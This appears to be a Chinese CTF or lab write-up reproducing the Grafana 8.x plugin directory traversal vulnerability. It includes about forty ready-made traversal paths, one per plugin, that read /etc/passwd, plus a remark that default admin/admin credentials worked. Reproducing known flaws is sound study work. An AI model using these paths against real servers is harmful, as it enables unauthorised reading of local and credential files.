前言
详细的漏洞分析见https://blog.csdn.net/weixin_45794666/article/details/123228409
漏洞描述
Grafana 是一个用于监控和可观察性的开源平台。Grafana 版本 8.0.0-beta1 到 8.3.0(补丁版本除外)容易受到目录遍历,允许访问本地文件。易受攻击的 URL 路径是:/public/plugins//,其中是任何已安装插件的插件 ID。Grafana Cloud 在任何时候都不会受到攻击。建议用户升级到补丁版本 8.0.7、8.1.8、8.2.7 或 8.3.1。GitHub 安全公告包含有关易受攻击的 URL 路径、缓解措施和披露时间表的更多信息。
复现过程
端口是3000
打开后是个登陆界面
试了下默认密码admin/admin,没想到进来了…
好了不玩了,以上不是本次漏洞的复现过程
首先是抓一个包
构造payload路径,因为漏洞是由插件造成的,不同插件的payload略有差别,下面是几乎所有插件的payload
/public/plugins/alertlist/../../../../../../../../../../../etc/passwd /public/plugins/annolist/../../../../../../../../../../../etc/passwd /public/plugins/grafana-azure-monitor-datasource/../../../../../../../../../../../etc/passwd /public/plugins/barchart/../../../../../../../../../../../etc/passwd /public/plugins/bargauge/../../../../../../../../../../../etc/passwd /public/plugins/cloudwatch/../../../../../../../../../../../etc/passwd /public/plugins/dashlist/../../../../../../../../../../../etc/passwd /public/plugins/elasticsearch/../../../../../../../../../../../etc/passwd /public/plugins/gauge/../../../../../../../../../../../etc/passwd /public/plugins/geomap/../../../../../../../../../../../etc/passwd /public/plugins/gettingstarted/../../../../../../../../../../../etc/passwd /public/plugins/stackdriver/../../../../../../../../../../../etc/passwd /public/plugins/graph/../../../../../../../../../../../etc/passwd /public/plugins/graphite/../../../../../../../../../../../etc/passwd /public/plugins/heatmap/../../../../../../../../../../../etc/passwd /public/plugins/histogram/../../../../../../../../../../../etc/passwd /public/plugins/influxdb/../../../../../../../../../../../etc/passwd /public/plugins/jaeger/../../../../../../../../../../../etc/passwd /public/plugins/logs/../../../../../../../../../../../etc/passwd /public/plugins/loki/../../../../../../../../../../../etc/passwd /public/plugins/mssql/../../../../../../../../../../../etc/passwd /public/plugins/mysql/../../../../../../../../../../../etc/passwd /public/plugins/news/../../../../../../../../../../../etc/passwd /public/plugins/nodeGraph/../../../../../../../../../../../etc/passwd /public/plugins/opentsdb/../../../../../../../../../../../etc/passwd /public/plugins/piechart/../../../../../../../../../../../etc/passwd /public/plugins/pluginlist/../../../../../../../../../../../etc/passwd /public/plugins/postgres/../../../../../../../../../../../etc/passwd /public/plugins/prometheus/../../../../../../../../../../../etc/passwd /public/plugins/stat/../../../../../../../../../../../etc/passwd /public/plugins/state-timeline/../../../../../../../../../../../etc/passwd /public/plugins/status-history/../../../../../../../../../../../etc/passwd /public/plugins/table/../../../../../../../../../../../etc/passwd /public/plugins/table-old/../../../../../../../../../../../etc/passwd /public/plugins/tempo/../../../../../../../../../../../etc/passwd /public/plugins/testdata/../../../../../../../../../../../etc/passwd /public/plugins/text/../../../../../../../../../../../etc/passwd /public/plugins/timeseries/../../../../../../../../../../../etc/passwd /public/plugins/welcome/../../../../../../../../../../../etc/passwd /public/plugins/zipkin/../../../../../../../../../../../etc/passwd
拿第一个举例,把请求路径改为payload路径
可以读到passwd文件
flag在哪里呢?
在历史命令里面
修复建议
升级版本或者打补丁
